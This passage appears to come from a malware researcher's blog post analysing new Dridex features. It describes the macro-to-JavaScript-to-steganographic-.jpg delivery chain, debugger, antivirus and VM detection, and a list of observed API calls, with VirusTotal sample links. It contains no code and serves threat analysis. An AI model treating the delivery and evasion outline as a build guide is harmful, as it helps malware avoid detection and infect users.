  2. https://www.virustotal.com/it/file/77f6b395d65e869244cb526a17bda4cecf9220bcf4a7f47b898515f8e9b08c24/analysis/
  3. https://www.virustotal.com/it/file/e236ff3b1a65d42a11e74ebdaadc872f4d2b6e7aa2ee43b29cf123badc3d3e1b/analysis/
  4. https://www.virustotal.com/it/file/10eb146208f656b2f417a704b227f50cbf3eec67be67006db5dcc4a96228da32/analysis/
  5. https://www.virustotal.com/it/file/442f0e588d6270459914749e50d39d2feeec2d114e0ef357c57cb784fd9852f0/analysis/
  6. https://www.virustotal.com/it/file/a7230146b45eb9bb5940df9d9f65e63fc650c2afb3fc8502c5ded16c7f625b2a/analysis/
  7. https://www.virustotal.com/it/file/ba12cf6d096727e21a8de6202f05bba6c1917a1c638b59359130c0fe049d1c23/analysis/
  8. https://www.virustotal.com/it/file/780b005dbf3b24f1983fc36da125313a302bc787b77827d1eb9b2d347bed5439/analysis/
  9. https://www.virustotal.com/it/file/d48dd0b45639d1bd51db72e1adc5cbed344f31c6ce309874c4bc426ac59785e0/analysis/
  10. https://www.virustotal.com/it/file/87dd00b45358dc3ae3a4df65107601740aa24ce794bdf9e496dd79cf2606fc0b/analysis/

#Dridex gets an upgrade [Update]

Proofpoint and Phishme.com both confirm new developments

Since the beginning of the year Dridex has returned with an number of new features

  • New botnet ID's targeting Germany

  • New persistence methods, including writing to start folders at shutdown

  • Increased CPU usage when executing(!) 

  • AV targeting and debugger checks

A few samples i've analysed over the past few weeks have exhibited new capabilities, at least in terms of the delivery method and 'on disk' activity. 'Macroseses' as they are referred to in the current campaign mechanisms still prompt the user to enable macros, and still use a AutoOpen mechanism to extract and run. The current delivery is as follows.

MWI>Doc>Macro>Javascript>download over HTTP a .jpg > extract binary and finally execute in %appdata%

The developers appear to be experimenting with new capabilities, the malware i've observed recently appears to be using some rudimentary steganography.

Along with payload development the content is undergoing some active anti reversing tricks using debugger checks which will stop execution if a debugger is detected which i have not personally observed being used by Dridex this year.

Dridex is actively looking to avoid detection and will return an exit to the process if it detects a debugger attached to it. Further advances to the payload include Antivirus checks which in this particular payload had checks for Comodo Security suite.

I also observed some odd behavior in relation to what is being described as 'white hat' activity, by mainstream media. One payload was benign and delivered Avira Antivirus in the way i described above.

Some of the compromised sites hosting the Avira payload had what appeared to be a calling card left as a warning with cryptic messages relating to 'owner' or 'pwner?' and the host.

 

The final observations are the worrying strings associated with the detection of virtualization.

Observed API calls

  • Lower 163bcc30 BusVMware
  • GetSystemTimeAsFileTime
  • GetProcessHeap
  • MountPointManager
  • FindResourceA
  • GetTickCount
  • Sleep
  • GetStartupInfoA
  • TerminateProcess
  • UnhandledExceptionFilter
  • IsDebuggerPresent
  • LockResource
  • FindWindowExA
  • FindWindowA
  • RegOpenKeyExW
  • OpenProcessToken
  • GetUserNameW